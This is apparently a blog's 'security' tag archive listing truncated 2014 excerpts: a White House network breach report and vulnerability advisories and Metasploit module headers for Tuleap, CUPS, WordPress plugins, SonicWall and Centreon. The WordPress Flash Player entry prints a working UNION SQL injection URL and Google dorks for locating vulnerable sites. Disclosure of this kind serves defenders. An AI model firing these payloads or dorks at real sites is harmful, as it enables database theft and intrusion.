Tags archives: security

 

0

White House computer network ‘hacked’

A White House computer network has been breached by hackers, it has been reported. The unclassified Executive Office of the President network was attacked, according to the Washington Post. US authorities are reported to be investigating the breach, which was reported to officials by an ally of the US, sources said. White House officials believe [...]

 

0

NuevoLabs flash player for clipshare SQL Injection

Nuevolabs Nuevoplayer for clipshare SQL Injection =======================================================================   :: ADVISORY SUMMARY :: Title: Nuevolabs Nuevoplayer for clipshare Sql Injection Vendor: NUEVOLABS (www.nuevolabs.com) Product: NUEVOPLAYER for clipshare Credits: Cory Marsh – protectlogic.com Discovery: 2014-10-10 Release: 2014-10-28   Nueovplayer is a popular flash video player with integration into multiple popular video sharing suites. The most notable is [...]

 

0

Tuleap 7.4.99.5 Remote Command Execution

Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap CVE: CVE-2014-7178 Vendor: Enalean Product: Tuleap Affected version: 7.4.99.5 and earlier Fixed version: 7.5 Reported by: Jerzy Kramarz   Details:   Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() [...]

 

0

Tuleap 7.2 XXE Injection

Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap CVE: CVE-2014-7177 Vendor: Enalean Product: Tuleap Affected version: 7.2 and earlier Fixed version: 7.4.99.5 Reported by: Jerzy Kramarz   Details:   A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow [...]

 

0

Tuleap 7.4.99.5 Blind SQL Injection

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap CVE: CVE-2014-7176 Vendor: Enalean Product: Tuleap Affected version: 7.4.99.5 and earlier Fixed version: 7.5 Reported by: Jerzy Kramarz   Details:   SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker [...]

 

0

CUPS Filter Bash Environment Variable Code Injection

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require ‘msf/core’ class Metasploit4 ‘CUPS Filter Bash Environment Variable Code Injection’, ‘Description’ => %q{ This module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically [...]

 

0

WordPress Download Manager Arbitrary File Download

# WordPress Download Manager Plugin – Arbitrary File Download # CWE: CWE-98 # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 25/10/2014 # Vendor Homepage: https://wordpress.org/plugins/download-manager/ # Tested on: Windows 7 and Gnu/Linux # Google Dork: inurl:/plugins/download-manager/   # VUL: /views/file_download.php?fname=   or:   /file_download.php?fname=   # PoC :   [...]

 

0

WordPress HTML5 / Flash Player SQL Injection

# WordPress HTML5 and FLash PLayer Plugin SQL Injection # CWE: CWE-89 # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 24/10/2014 # Vendor Homepage: https://wordpress.org/plugins/player/ # Tested on: Windows 7 and Gnu/Linux # Google Dork: inurl: “Index of” +inurl:/wp-content/plugins/player/   # PoC :   http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()– [...]

 

0

Dell SonicWall GMS v7.2.x – Persistent Web Vulnerability

Document Title: =============== Dell SonicWall GMS v7.2.x – Persistent Web Vulnerability   References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1222   Release Date: ============= 2014-10-21   Vulnerability Laboratory ID (VL-ID): ==================================== 1222   Common Vulnerability Scoring System: ==================================== 3   Product & Service Introduction: =============================== Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and [...]

 

0

Centreon SQL / Command Injection

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, ‘Name’ => ‘Centreon SQL and Command Injection’, ‘Description’ => %q{ This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon Enterprise [...]